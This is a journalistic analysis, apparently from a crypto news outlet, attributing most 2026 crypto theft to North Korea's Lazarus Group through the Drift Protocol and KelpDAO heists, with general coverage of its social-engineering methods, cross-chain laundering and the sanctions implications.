In 2026, three out of every four dollars stolen in crypto globally ended up in the same place: Pyongyang. According to TRM Labs, North Korea was responsible for 76% of all value stolen in crypto attacks in 2026 (through April). The number is alarming — but what it conceals is more alarming still. This dominance didn't come from a flood of attacks. It came from just two heists, totaling around $577 million. And you've already read about both here.
The first was the $285 million hack of Drift Protocol, which proved to be a six-month social engineering operation linked to North Korea. The second was the approximately $292 million exploit on KelpDAO, which we covered in the month cross-chain bled — and which Chainalysis, ON3X's blockchain analytics partner, now formally attributes to the Lazarus Group. Two separate reports that, together, make up three-quarters of all crypto crime for the year. This is the thesis of this story: the era of the lone hacker is over. What exists today is a State with a profit center.
Two heists, not a wave
The naive reading of 76% is to imagine armies of North Korean hackers sweeping through DeFi every day. It's the opposite. North Korea is conducting fewer attacks, but bigger ones — and just two of them were enough to take the year. Drift and KelpDAO were not bugs exploited by chance: they were single-target operations, planned for months, with nine-figure returns each.
The contrast with the past is stark. In 2020, actors linked to North Korea accounted for less than 10% of global crypto theft. In 2025, the regime took a record of approximately $2.02 billion — a 51% increase year-over-year —, raising the cumulative total since 2017 to over $6 billion. The trajectory is one of concentration: as the figures per heist explode, a single State's share of the total grows. Crypto ceased to be a target of opportunists and became an object of State policy.
The pattern is not new — it's the regime's signature. The 2025 record was driven by a single event: the theft of approximately $1.5 billion from Bybit at the beginning of the year, the largest hack in crypto history, also attributed to Lazarus. One heist defined 2025; two heists defined 2026. North Korea discovered it doesn't need volume — it needs a surgical operation of nine or ten digits per window. It's the difference between a pickpocket and a central bank robber.
The death of the lone hacker
Behind the heists is the Reconnaissance General Bureau (RGB), North Korea's intelligence agency, operating through the Lazarus Group and its sub-units. It's not an anarchic collective — it's a hierarchical structure, with targets, budgets, and a clear destination for the money: the regime's weapons and missile program, under heavy international sanctions.
That's what changes the nature of the problem. When Chainalysis's 2026 Crypto Crime Report describes the transition from lone hackers to large-scale criminal infrastructure, North Korea is the extreme case: an entire country transformed into a cybercriminal operation aimed at military funding. Each DeFi exploit attributed to Lazarus is not just a protocol's loss — it's a capital transfer to a weapons program.
The economic dimension is what makes the issue unavoidable. UN expert panel estimates have long pointed out that the theft of crypto assets finances a significant portion of the regime's weapons of mass destruction program — a revenue source that has evaded successive layers of commercial sanctions. For an isolated economy under embargo, a few billion dollars in liquid crypto per year is not change: it's one of the primary funding lines for ballistic missiles. That's why every stolen figure matters far beyond the ledger of a DeFi protocol.
The playbook is not exploit — it's people
Here is the market's most dangerous misconception: thinking you can defend against North Korea by auditing smart contracts. The primary vector for Lazarus is not code. It's people.
The Drift attack is a portrait of the method: a six-month operation, with fake professional identities, sector conference presence through proxies, and patient relationship-building with specific targets until gaining access. In parallel, Fireblocks documented campaigns of fake job interviews — phantom recruiters, Google Meet interviews, technical tests sent via GitHub that, when run, installed malware capable of exposing wallets, keys, and production systems. It's the same DNA as the "Mach-O Man", the macOS malware distributed via fake Zoom to crypto executives we mapped in April.
There's also the "Wagemole" strategy: infiltrating North Korean IT workers, with fraudulent identities, into legitimate companies worldwide. Once hired, they act as ordinary employees while passing intelligence to attack teams or facilitating theft from within. The attack surface ceased to be the technical perimeter and became HR.
How the money disappears
Stealing is half the work; the rest is washing it. After the United States sanctioned Tornado Cash and Sinbad.io, North Korean operators migrated their money laundering flows to cross-chain bridges — especially THORChain and LI.FI —, doing "chain hopping": they convert Ethereum to Bitcoin, then to stablecoins like DAI, jumping from blockchain to blockchain to scramble the trail.
It's no coincidence that THORChain appears as much in laundering as on the list of exploited bridges we covered in the cluster of three bridges in four days. Cross-chain infrastructure became, at the same time, both a target and a laundromat. The possible response is freezing at the issuer layer — like when Tether froze USDT at OFAC's request — but that only works for centralized stablecoins and when attribution arrives in time.
Why this is geopolitics, not technical support
It's worth closing with the contrast that surrounds all our cyber coverage. In the case of Comando Vermelho, crypto crime is territorial and analog at the entry — an illegal electrical tap in a Rio favela. In North Korea, it's state-sponsored and sophisticated from entry to exit: intelligence agency, six-month social engineering, cross-chain laundering. They're the two extremes of the same spectrum — and both end in the same place, the blockchain, because it's the only settlement layer that asks no permission and returns no money.
For a DeFi protocol, the practical consequence is harsh: the relevant adversary is no longer the script kiddie chasing a reentrancy. It's a nation-state with six-month patience, an intelligence budget, and a missile program to finance. Defending against that is personnel and process hygiene — vetting candidate identities, segregating keys, distrusting "recruiters" —, not just contract audits.
The ON3X perspective
Three takeaways from this number:
- 76% with two heists is a statistic about concentration, not frequency. North Korea doesn't hack more; it hacks bigger. Systemic risk migrated from the quantity of attacks to the size of each one — and a single successful operation per quarter is enough to dominate the entire year.
- The weakest link is human, not technical. Drift, Mach-O Man, and the fake interviews tell the same story: Lazarus enters through people, not code. Anyone treating crypto security as a smart contract audit problem is defending the wrong door.
- Every Lazarus hack is a sanctions problem. The stolen money finances weapons under embargo. This transforms every DeFi exploit into a national security question — and explains why stablecoin freezing, on-chain attribution, and cooperation between analytics firms (Chainalysis, TRM, Elliptic) have shifted from technical detail to a foreign policy tool.
Frequently asked questions
Did North Korea really steal 76% of all crypto in 2026?
According to TRM Labs, actors linked to North Korea were responsible for approximately 76% of all value stolen in crypto attacks in 2026 through April. The figure is dominated by just two heists — Drift Protocol and KelpDAO — which totaled approximately $577 million.
What were the two attacks?
The approximately $285 million hack of Drift Protocol, revealed as a six-month social engineering operation linked to North Korea, and the approximately $292 million exploit on KelpDAO's cross-chain bridge, attributed by Chainalysis to the Lazarus Group.
How does North Korea launder stolen crypto?
After the U.S. sanctioned Tornado Cash and Sinbad.io, operators migrated to cross-chain bridges like THORChain and LI.FI, performing "chain hopping" — converting Ethereum to Bitcoin and then to stablecoins like DAI, jumping between blockchains to obscure the trail.
Why does this matter beyond the crypto market?
The stolen resources finance North Korea's weapons and missile program, under international sanctions. This transforms each exploit attributed to Lazarus into a sanctions evasion and national security issue, not just a protocol loss.